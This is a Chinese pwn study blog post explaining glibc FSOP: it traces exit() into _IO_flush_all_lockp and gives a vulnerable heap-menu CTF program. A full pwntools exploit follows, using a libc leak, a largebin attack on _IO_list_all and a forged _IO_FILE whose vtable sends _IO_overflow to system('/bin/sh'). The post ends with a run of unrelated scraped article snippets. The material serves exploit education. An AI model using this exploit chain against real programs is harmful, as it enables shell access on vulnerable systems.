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【我的 PWN 学习手札】IO_FILE 之 FSOP

FSOP:File Stream Oriented Programming

通过劫持 _IO_list_all 指向伪造的 _IO_FILE_plus,进而调用fake IO_FILE 结构体对象中被伪造的vtable指向的恶意函数。

目录

前言

一、glibc-exit函数浅析

二、FSOP

三、Largebin attack + FSOP

(一)Leak libc

(二)Largebin attack

(三)FSOP 

(四)调试追踪调用

(五)EXP


前言

我们将着重关注vtable中的_IO_file_overflow函数指针。

当函数exit时,程序执行_IO_flush_all_lockp 函数。该函数会刷新 _IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用fflush ,也对应着会调用 _IO_FILE_plus.vtable 中的_IO_overflow。

参考宝藏博主:linux IO_FILE 利用_io list all结构体-CSDN博客 


一、glibc-exit函数浅析

一般FSOP可以通过exit来触发布置好的fake IO,我们来粗略过一遍流程

// exit.c
void exit(int status)
{__run_exit_handlers(status, &__exit_funcs, true);
}
libc_hidden_def(exit)/* Call all functions registered with `atexit' and `on_exit',in the reverse of the order in which they were registeredperform stdio cleanup, and terminate program execution with STATUS.  */
voidattribute_hidden__run_exit_handlers(int status, struct exit_function_list **listp,bool run_list_atexit)
{/* First, call the TLS destructors.  */
#ifndef SHAREDif (&__call_tls_dtors != NULL)
#endif__call_tls_dtors();/* We do it this way to handle recursive calls to exit () made bythe functions registered with `atexit' and `on_exit'. We calleveryone on the list and use the status value in the lastexit (). */while (*listp != NULL){struct exit_function_list *cur = *listp;while (cur->idx > 0){const struct exit_function *const f =&cur->fns[--cur->idx];switch (f->flavor){void (*atfct)(void);void (*onfct)(int status, void *arg);void (*cxafct)(void *arg, int status);case ef_free:case ef_us:break;case ef_on:onfct = f->func.on.fn;
#ifdef PTR_DEMANGLEPTR_DEMANGLE(onfct);
#endifonfct(status, f->func.on.arg);break;case ef_at:atfct = f->func.at;
#ifdef PTR_DEMANGLEPTR_DEMANGLE(atfct);
#endifatfct();break;case ef_cxa:cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLEPTR_DEMANGLE(cxafct);
#endifcxafct(f->func.cxa.arg, status);break;}}*listp = cur->next;if (*listp != NULL)/* Don't free the last element in the chain, this is the staticallyallocate element.  */free(cur);}if (run_list_atexit)RUN_HOOK(__libc_atexit, ());_exit(status);
}

exit实际调用了__run_exit_handlers函数。它的作用是在程序退出时调用所有通过 atexit 和 on_exit 注册的函数,并执行标准 I/O 清理,最终终止程序执行。

对于函数参数中的&__exit_funcs,可以继续追踪定位到其实现:

// cxa_atexit.c/* Register a function to be called by exit or when a shared libraryis unloaded.  This function is only called from code generated bythe C++ compiler.  */
int __cxa_atexit(void (*func)(void *), void *arg, void *d)
{return __internal_atexit(func, arg, d, &__exit_funcs);
}
libc_hidden_def(__cxa_atexit)/* We change global data, so we need locking.  */__libc_lock_define_initialized(static, lock)static struct exit_function_list initial;
struct exit_function_list *__exit_funcs = &initial;

对于“执行标准 I/O 清理”操作我们更为关心,chat得知是下述函数实现:

  if (run_list_atexit)RUN_HOOK(__libc_atexit, ());

 经过全局搜索可追溯到:

// genops.c
#ifdef text_set_element
text_set_element(__libc_atexit, _IO_cleanup);
#endif

此处已经看到,执行了IO清理的操作,继续追溯:

int
_IO_cleanup (void)
{/* We do *not* want locking.  Some threads might use streams butthat is their problem, we flush them underneath them.  */int result = _IO_flush_all_lockp (0);/* We currently don't have a reliable mechanism for making sure thatC++ static destructors are executed in the correct order.So it is possible that other static destructors might want towrite to cout - and they're supposed to be able to do so.The following will make the standard streambufs be unbuffered,which forces any output from late destructors to be written out. */_IO_unbuffer_all ();return result;
}int
_IO_flush_all_lockp (int do_lock)
{int result = 0;struct _IO_FILE *fp;int last_stamp;#ifdef _IO_MTSAFE_IO__libc_cleanup_region_start (do_lock, flush_cleanup, NULL);if (do_lock)_IO_lock_lock (list_all_lock);
#endiflast_stamp = _IO_list_all_stamp;fp = (_IO_FILE *) _IO_list_all;while (fp != NULL){run_fp = fp;if (do_lock)_IO_flockfile (fp);if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T|| (_IO_vtable_offset (fp) == 0&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr> fp->_wide_data->_IO_write_base))
#endif)&& _IO_OVERFLOW (fp, EOF) == EOF)result = EOF;if (do_lock)_IO_funlockfile (fp);run_fp = NULL;if (last_stamp != _IO_list_all_stamp){/* Something was added to the list.  Start all over again.  */fp = (_IO_FILE *) _IO_list_all;last_stamp = _IO_list_all_stamp;}elsefp = fp->_chain;}#ifdef _IO_MTSAFE_IOif (do_lock)_IO_lock_unlock (list_all_lock);__libc_cleanup_region_end (0);
#endifreturn result;
}

至此看到,对于_IO_list_all上的IO_FILE链,都执行_IO_OVERFLOW的操作。 

二、FSOP

劫持 _IO_list_all 的方式一般有两种:

  1. 修改 IO_FILE 结构体,为了不影响 IO 建议修改 _IO_2_1_stderr 结构体。
  2. 利用例如 large bin attack 的攻击方法将 _IO_list_all 覆盖成一个 chunk 地址,然后在该 chunk 上伪造 IO_FILE 结构体。 

        在劫持 _IO_2_1_stderr 时除了修改 vtable 指针指向伪造 vtable 外,要想调用 _IO_2_1_stderr 还需要修改 以满足以下条件:

fp->_mode _IO_write_ptr > fp->_IO_write_base

        因此不妨将 vtable 伪造在 _IO_2_1_stderr + 0x10 处使 _IO_overflow , _IO_2_1_stderr 的 fp->_IO_write_ptr 恰好对应于 vtable 的 _IO_overflow 。然后将fp->_IO_write_ptr 写入 system 函数地址。由于_IO_overflow 传入的参数为_IO_2_1_stderr 结构体,因此将结构体其实位置处写入 /bin/sh 字符串。 

                                                                                                                  ——by _sky123_

这里通过模板题,利用largebin attack来实现FSOP 

三、Largebin attack + FSOP

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>char *chunk_list[0x100];void menu() {puts("1. add chunk");puts("2. delete chunk");puts("3. edit chunk");puts("4. show chunk");puts("5. exit");puts("choice:");
}int get_num() {char buf[0x10];read(0, buf, sizeof(buf));return atoi(buf);
}void add_chunk() {puts("index:");int index = get_num();puts("size:");int size = get_num();chunk_list[index] = malloc(size);
}void delete_chunk() {puts("index:");int index = get_num();free(chunk_list[index]);
}void edit_chunk() {puts("index:");int index = get_num();puts("length:");int length = get_num();puts("content:");read(0, chunk_list[index], length);
}void show_chunk() {puts("index:");int index = get_num();puts(chunk_list[index]);
}int main() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);while (1) {menu();switch (get_num()) {case 1:add_chunk();break;case 2:delete_chunk();break;case 3:edit_chunk();break;case 4:show_chunk();break;case 5:exit(0);default:puts("invalid choice.");}}
}

(一)Leak libc

同时为了准备largebin attack,申请largebin范围大小的chunk

# leak libc
add(0,0x10)
add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x10)
delete(0)
delete(2)

show(0)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x39bb78
success(hex(libc.address))
show(2)
io.recvline()
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success(hex(heap_base))

(二)Largebin attack

# Largebin attack
add(0,0x418)
add(10,0x500)   
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))     
delete(0)
add(10,0x500)

确实写了一个堆地址,但是为了能够布置数据,我们希望能将堆申请出来。为此我们不通过申请大chunk来触发largebin attack,而是申请一个小chunk,释放unsortedbin chunk到largebin中触发,又从largebin中取出chunk,到unsortedbin。至此largebin里只剩下目标chunk,我们再恢复一下相关指针,就可以将该chunk malloc出来。

修改上述exp片段代码

# Largebin attack
add(0,0x418)
add(10,0x500)
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))
delete(0)
add(10,0x10)

可以看到unsortedbin里有一个chunk,largebin生下了目标chunk,接下来恢复指针

# fd、bk指向libc,fd_nextsize、bk_nextsize指向自己
edit(2,p64(libc.address+0x39bf68)*2+p64(heap_base+0x460)*2)

接下来申请出目标chunk

add(0,0x428)

(三)FSOP 

可见我们可控的区域实际上偏移了0x10,为此我们可以通过物理临近的前一个chunk复用prev_size字段来修改。

IO_FILE有模板,这里给出(来自这个大佬的博客) 

fake_file = b""
fake_file += b"/bin/sh\x00"  # _flags, an magic number
fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8, b'\x00')  # adjust to vtable
fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable

由于缺了0x10可控,这里需要薛微调整一下:

fake_file = b""
# fake_file += b"/bin/sh\x00"  # _flags, an magic number
# fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8-0x10, b'\x00')  # adjust to vtable
# fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable
fake_file += p64(heap_base+0x460 + 0x10)  # fake vtable
edit(0,fake_file)

然后就:

pwndbg> p *_IO_list_all
$4 = {file = {_flags = 0,_IO_read_ptr = 0x431 <error: Cannot access memory at address 0x431>,_IO_read_end = 0x0,_IO_read_base = 0x0,_IO_write_base = 0x0,_IO_write_ptr = 0x72d08ec3f560 <__libc_system> "H\205\377t\v\351\206\372\377\377f\017\037D",_IO_write_end = 0x0,_IO_buf_base = 0x0,_IO_buf_end = 0x0,_IO_save_base = 0x0,_IO_backup_base = 0x0,_IO_save_end = 0x0,_markers = 0x0,_chain = 0x72d08ef9c620 <_IO_2_1_stdout_>,_fileno = 2,_flags2 = 0,_old_offset = -1,_cur_column = 0,_vtable_offset = 0 '\000',_shortbuf = "\n",_lock = 0x72d08ef9e4c0 <prof_info+160>,_offset = -1,_codecvt = 0x0,_wide_data = 0x72d08ef9c4c0 <_nl_global_locale+160>,_freeres_list = 0x0,_freeres_buf = 0x0,__pad5 = 0,_mode = -1,_unused2 = '\000' <repeats 19 times>},vtable = 0x5e7f135df470
}
pwndbg> p *_IO_list_all.vtable 
$5 = {__dummy = 0,__dummy2 = 0,__finish = 0x0,__overflow = 0x72d08ec3f560 <__libc_system>,__underflow = 0x0,__uflow = 0x0,__pbackfail = 0x0,__xsputn = 0x0,__xsgetn = 0x0,__seekoff = 0x0,__seekpos = 0x0,__setbuf = 0x72d08ef9c620 <_IO_2_1_stdout_>,__sync = 0x2,__doallocate = 0xffffffffffffffff,__read = 0xa000000,__write = 0x72d08ef9e4c0 <prof_info+160>,__seek = 0xffffffffffffffff,__close = 0x0,__stat = 0x72d08ef9c4c0 <_nl_global_locale+160>,__showmanyc = 0x0,__imbue = 0x0
}

然后我们通过chunk_list[1]来布置"/bin/sh\x00"

edit(1,p64(0)*2+b'/bin/sh\x00')

(四)调试追踪调用

exit -> __run_exit_handlers -> _IO_cleanup -> _IO_flush_all_lockp -> fileop.vtable.overflow

fileop已经被我们劫持,也在该结构体头布置了”/bin/sh\x00"参数,因此执行system("/bin/sh\x00")

(五)EXP 

from pwn import *elf=ELF("./pwn")
libc=ELF("./libc.so.6")
context.arch=elf.arch
context.log_level='debug'
context.os=elf.os
def add(index, size):io.sendafter(b"choice:", b"1")io.sendafter(b"index:", str(index).encode())io.sendafter(b"size:", str(size).encode())def delete(index):io.sendafter(b"choice:", b"2")io.sendafter(b"index:", str(index).encode())def edit(index, content):io.sendafter(b"choice:", b"3")io.sendafter(b"index:", str(index).encode())io.sendafter(b"length:", str(len(content)).encode())io.sendafter(b"content:", content)def show(index):io.sendafter(b"choice:", b"4")io.sendafter(b"index:", str(index).encode())io=process("./pwn")# leak libc
add(0,0x10)
add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x10)
delete(0)
delete(2)show(0)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x39bb78
success(hex(libc.address))
show(2)
io.recvline()
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success(hex(heap_base))# Largebin attack
add(0,0x418)
add(10,0x500)
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))  # 0x39bf68
delete(0)
add(10,0x10)
edit(2,p64(libc.address+0x39bf68)*2+p64(heap_base+0x460)*2)
add(0,0x428)fake_file = b""
# fake_file += b"/bin/sh\x00"  # _flags, an magic number
# fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8-0x10, b'\x00')  # adjust to vtable
# fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable
fake_file += p64(heap_base+0x460 + 0x10)  # fake vtable
edit(0,fake_file)
edit(1,p64(0)*2+b'/bin/sh\x00')gdb.attach(io,'b exit\nc')io.interactive()

 

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【Unity报错】error Cs0103: The name ‘keyCode‘ does not exist in the current context

报错提示&#xff1a; 解决方法&#xff1a; KeyCode K大写...

家用万兆网络实践:紧凑型家用服务器静音化改造(二)

大家好&#xff0c;这篇文章我们继续分享家里网络设备的万兆升级和静音改造经验&#xff0c;希望对有类似需求的朋友有所帮助。 写在前面 在上一篇《家用网络升级实践&#xff1a;低成本实现局部万兆&#xff08;一&#xff09;》中&#xff0c;我们留下了一些待解决的问题。…...

“AI智能实训系统:让学习更高效、更轻松!

大家好&#xff0c;作为一名资深产品经理&#xff0c;今天我来跟大家聊聊一款备受瞩目的产品——AI智能实训系统。在这个人工智能技术飞速发展的时代&#xff0c;AI智能实训系统应运而生&#xff0c;为广大学习者提供了全新的学习体验。那么&#xff0c;这款产品究竟有哪些亮点…...

【Linux 之一 】Linux常用命令汇总

Linux常用命令 ./catcd 命令chmodclearcphistoryhtoplnmkdirmvpwdrmtailunamewcwhoami 我从2021年4月份开始才开始真正意义上接触Linux&#xff0c;最初学习时是一脸蒙圈&#xff0c;啥也不会&#xff0c;啥也不懂&#xff0c;做了很多乱七八糟&#xff0c;没有条理的笔记。不知…...

Git 从入门到精通

一、环境配置 下载地址&#xff1a;https://git-scm.com/downloads/ 二、用户配置 找到git bash git --version 查看当前版本 git config --global user.name szhipeng625 设置用户名 git config --global user.email szhipeng625gmail.com 设置邮箱 git config --global …...

【Uniapp-Vue3】创建自定义页面模板

大多数情况下我们都使用的是默认模板&#xff0c;但是默认模板是Vue2格式的&#xff0c;如果我们想要定义一个Vue3模板的页面就需要自定义。 一、我们先复制下面的模板代码&#xff08;可根据自身需要进行修改&#xff09;&#xff1a; <template><view class"…...

Ansible之批量管理服务器

文章目录 背景第一步、安装第二步、配置免密登录2.1 生成密钥2.2 分发公钥2.3 测试无密连接 背景 Ansible是Python强大的服务器批量管理 第一步、安装 首先要拉取epel数据源&#xff0c;执行以下命令 yum -y install epel-release安装完毕如下所示。 使用 yum 命令安装 an…...

android compose 串口通信

1.添加依赖 implementation("io.github.xmaihh:serialport:2.1.1") 2.添加SerialHelper派生类 class SerialPortHelper(portName:String,baudRate:Int): SerialHelper(portName,baudRate) {var receivedDataBuffer mutableListOf<Byte>()override fun onDa…...

ios脚本巨魔商店多巴胺越狱基本操作教程

准备工作 确认设备兼容性&#xff1a;A9-A11&#xff08;iPhone6s&#xff0d;X&#xff09;&#xff1a;iOS15.0-16.6.1&#xff1b;A12-A14&#xff08;iPhoneXR&#xff0d;12PM&#xff09;&#xff1a;iOS15.0-16.5.1&#xff1b;A15-A16&#xff08;iPhone13&#xff0d…...

NLP项目实战——基于Bert模型的多情感评论分类(附数据集和源码)

在当今数字化的时代&#xff0c;分析用户评论中的情感倾向对于了解产品、服务的口碑等方面有着重要意义。而基于强大的预训练语言模型如 Bert 来进行评论情感分析&#xff0c;能够取得较好的效果。 在本次项目中&#xff0c;我们将展示如何利用 Python 语言结合transformers库&…...

.NET framework、Core和Standard都是什么?

对于这些概念一直没有深入去理解&#xff0c;以至于经过.net这几年的发展进化&#xff0c;概念越来越多&#xff0c;越来越梳理不容易理解了。内心深处存在思想上的懒惰&#xff0c;以为自己专注于Unity开发就好&#xff0c;这些并不属于核心范畴&#xff0c;所以对这些概念总是…...

Mybatis原理简介

看到Mybatis的框架图&#xff0c;可以清晰的看到Mybatis的整体核心对象&#xff0c;我更喜欢用自己的图来表达Mybatis的整个的执行流程。如下图所示&#xff1a; 原理详解&#xff1a; MyBatis应用程序根据XML配置文件创建SqlSessionFactory&#xff0c;SqlSessionFactory在根…...

腾讯云AI代码助手-公司职位分析AI助手

作品简介 腾讯云AI代码助手是一款智能工具&#xff0c;专注于为公司提供职位分析服务。通过自然语言处理和机器学习技术&#xff0c;它能快速解析职位描述&#xff0c;提取关键信息&#xff0c;并提供数据驱动的洞察&#xff0c;帮助公司优化招聘流程和职位设计。 技术架构 …...

腾讯云AI代码助手编程挑战赛-解忧助手

作品简介 何以解忧,唯有杜康。而随着Ai的发展,解忧不再只有杜康还有Ai,使用的是腾讯云AI代码助手来生成的所有代码&#xff0c;使用方便&#xff0c;快捷&#xff0c;高效。 技术架构 采用了全后端分离的架构&#xff0c;前端使用Vue.js&#xff0c;腾讯云的AI服务处理自然语…...

Sentinel服务保护 + Seata分布式事务

服务保护 【雪崩问题】微服务调用链路中某个服务&#xff0c;引起整个链路中所有微服务都不可用。 【原因】&#xff1a; 微服务相互调用&#xff0c;服务提供者出现故障。服务调用这没有做好异常处理&#xff0c;导致自身故障。调用链中所有服务级联失败&#xff0c;导致整个…...

【Leetcode·中等·数组】59. 螺旋矩阵 II(spiral matrix ii)

题目描述 英文版描述 Given a positive integer n, generate an n x n matrix filled with elements from 1 to n(2) in spiral order. Example 1: Input: n 3 Output: [[1,2,3],[8,9,4],[7,6,5]] 提示&#xff1a; 1 < n < 20 英文版地址 https://leetcode.com…...

WebSocket 扩展生态:协议与框架

在前七篇文章中,我们深入探讨了 WebSocket 的基础原理、开发实践和实战案例。今天,让我们把视野扩展到 WebSocket 的生态系统,看看有哪些扩展协议和框架可以帮助我们更好地开发 WebSocket 应用。我曾在一个大型即时通讯项目中,通过合理使用这些工具,将开发效率提升了 50%。 扩…...

MySQL —— 在CentOS9下安装MySQL

MySQL —— 在CentOS9下安装MySQL 1.查看自己操作系统的版本2.找到对应的安装源3.上传我们在windows下&#xff0c;下载的文件&#xff0c;解压4.执行rpm命令&#xff0c;启用MySQL8仓库5.执行dnf install -y mysql-community-server6.设置开机自启动7.获得初始密码8.登录MySQL…...

用VS C#构建Windows服务【纯操作版,附带项目地址】

1.点击“创建新项目”,选择“Windows 服务(.NET Framework)” 2、给项目命名 3、双击“Service1.cs”,右键,选择“添加安装程序”,就会生成一个“ProjectInstaller.cs”文件 4、双击“ProjectInstaller.cs”文件,右键“serviceProcessInstaller1”,选择“属性…...

1.UGUI相关

1.这一种UIcanvas下的组件,会显示在3d物体之前 2.可以设置3d物体在UI界面之前。选中第二个模式。这时候会指定一个摄像机。一般情况下&#xff0c;不用主摄像机。需要新建一个专门给UI的摄像机。相当于设置距离摄像机的远近。两个layer 可以理解成 章节&#xff0c;关卡。相同…...

大语言模型训练的数据集从哪里来?

继续上篇文章的内容说说大语言模型预训练的数据集从哪里来以及为什么互联网上的数据已经被耗尽这个说法并不专业&#xff0c;再谈谈大语言模型预训练数据集的优化思路。 1. GPT2使用的数据集是WebText&#xff0c;该数据集大概40GB&#xff0c;由OpenAI创建&#xff0c;主要内…...

Android 来电白名单 只允许联系人呼入电话

客户需求只允许通讯录中联系人可以呼入电话。参考自带的黑名单实现 CallsManager.java类中的onSuccessfulIncomingCall方法有一些过滤器&#xff0c;可以仿照黑名单的方式添加自己的过滤器。 packages/services/Telecomm/src/com/android/server/telecom/CallsManager.java …...

StarRocks Awards 2024 年度贡献人物

在过去一年&#xff0c;StarRocks 在 Lakehouse 与 AI 等关键领域取得了显著进步&#xff0c;其卓越的产品功能极大地简化和提升了数据分析的效率&#xff0c;使得"One Data&#xff0c;All Analytics" 的愿景变得更加触手可及。 虽然实现这一目标的道路充满挑战且漫…...

plane开源的自托管项目

Plane 是一个开源的自托管项目规划解决方案&#xff0c;专注于问题管理、里程碑跟踪以及产品路线图的设计。作为一款开源软件&#xff0c;Plane 的代码托管在 GitHub 平台上&#xff0c;允许任何人查看和贡献代码。它为用户提供了便捷的项目创建与管理手段&#xff0c;并配备了…...

WebLogic安全基线

WebLogic安全基线 一、 用户权限1 、检查weblogic 的启动用户2 、用户权限整改3 、使用普通用户重启weblogic 二、账户共用1 、检查weblogic 控制台的账户2 、账户共用整改3 、测试登录weblogic 控制台新账户 三、 账户清理1 、检查weblogic 控制台的账户2 、帐户清理整改 四、…...

复杂园区网基本分支的构建

目录 1、各主机进行网络配置。2、交换机配置。3、配置路由交换&#xff0c;进行测试。4、配置路由器接口和静态路由&#xff0c;进行测试。5、最后测试任意两台主机通信情况 模拟环境链接 拓扑结构 说明&#xff1a; VLAN标签在上面的一定是GigabitEthernet接口的&#xff0c…...

设计模式-结构型-组合模式

1. 什么是组合模式&#xff1f; 组合模式&#xff08;Composite Pattern&#xff09; 是一种结构型设计模式&#xff0c;它允许将对象组合成树形结构来表示“部分-整体”的层次结构。组合模式使得客户端对单个对象和组合对象的使用具有一致性。换句话说&#xff0c;组合模式允…...

32单片机从入门到精通之用户界面——用户界面(十四)

不论你现在处于什么样的困境和挑战&#xff0c;不要放弃希望和努力。成功之路不会一帆风顺&#xff0c;但是只要你坚定信念&#xff0c;勇敢面对困难&#xff0c;努力奋斗&#xff0c;就一定能够战胜困难&#xff0c;迈向成功的道路。困难和挫折只是暂时的&#xff0c;而坚持和…...

Redis 优化秒杀(异步秒杀)

目录 为什么需要异步秒杀 异步优化的核心逻辑是什么&#xff1f; 阻塞队列的特点是什么&#xff1f; Lua脚本在这里的作用是什么&#xff1f; 异步调用创建订单的具体逻辑是什么&#xff1f; 为什么要用代理对象proxy调用createVoucherOrder方法&#xff1f; 对于代码的详细…...

NFS 组件容器化部署实战指南

文章目录 前言部署NFS服务器K8S部署NFS问题记录 前言 使用nfs-client-provisioner这个应用&#xff0c;利用nfs server给kubernets提供作为持久化后端&#xff0c;并且动态提供pv。所有节点需要安装nfs-utils组件&#xff0c;并且nfs服务器与kubernets worker节点都能网络连通…...

LCE(Local Cascade Ensemble)预测模型和LSTM(Long Short-Term Memory)模型在效果和特点上存在显著差异

LCE&#xff08;Local Cascade Ensemble&#xff09;预测模型和LSTM&#xff08;Long Short-Term Memory&#xff09;模型在效果和特点上存在显著差异。以下是对两者的比较&#xff1a; 一、效果比较 LCE模型&#xff1a; 优势&#xff1a;LCE结合了随机森林和XGBoost的优势&a…...

rk3568平台Buildroot编译实践:内核rootfs定制 及常见编译问题

目录 编译前准备常规编译流程定制内核修改内核 参数并增量 保存修改rootfs并增量 保存修改rootfs包下载源rootfs软件包增删refBuildroot 是一个用于自动化构建嵌入式 Linux 系统的工具。它通过使用简单的配置文件和 Makefile,能够从源代码开始交叉编译出一个完整的、可以运行在…...

头歌python实验:网络安全应用实践-恶意流量检测

第1关:re 库的使用 本关任务:编写一个能正则匹配出 ip 地址的小程序。 re 的主要功能函数 常用的功能函数包括: compile、search、match、split、findall(finditer)、sub(subn)。 re.search 函数 re.search 扫描整个字符串并返回第一个成功的匹配。 函数语法: re…...

Linux内核编程(二十一)USB应用及驱动开发

一、基础知识 1. USB接口是什么&#xff1f; USB接口&#xff08;Universal Serial Bus&#xff09;是一种通用串行总线&#xff0c;广泛使用的接口标准&#xff0c;主要用于连接计算机与外围设备&#xff08;如键盘、鼠标、打印机、存储设备等&#xff09;之间的数据传输和电…...

机器学习实战——决策树:从原理到应用的深度解析

✨个人主页欢迎您的访问 ✨期待您的三连 ✨ ✨个人主页欢迎您的访问 ✨期待您的三连 ✨ ✨个人主页欢迎您的访问 ✨期待您的三连✨ ​​​ ​​​ ​​ 决策树&#xff08;Decision Tree&#xff09;是一种简单而直观的分类与回归模型&#xff0c;在机器学习中广泛应用。它的…...

计算机网络的定义与发展历程

计算机网络的定义 计算机网络是指通过通信设备和传输介质将分布在不同地点的计算机及其相关设备&#xff08;如打印机、服务器等&#xff09;连接起来&#xff0c;按照一定的通信协议进行数据交换与资源共享的系统。计算机网络的基本功能包括&#xff1a;信息的传输、资源共享…...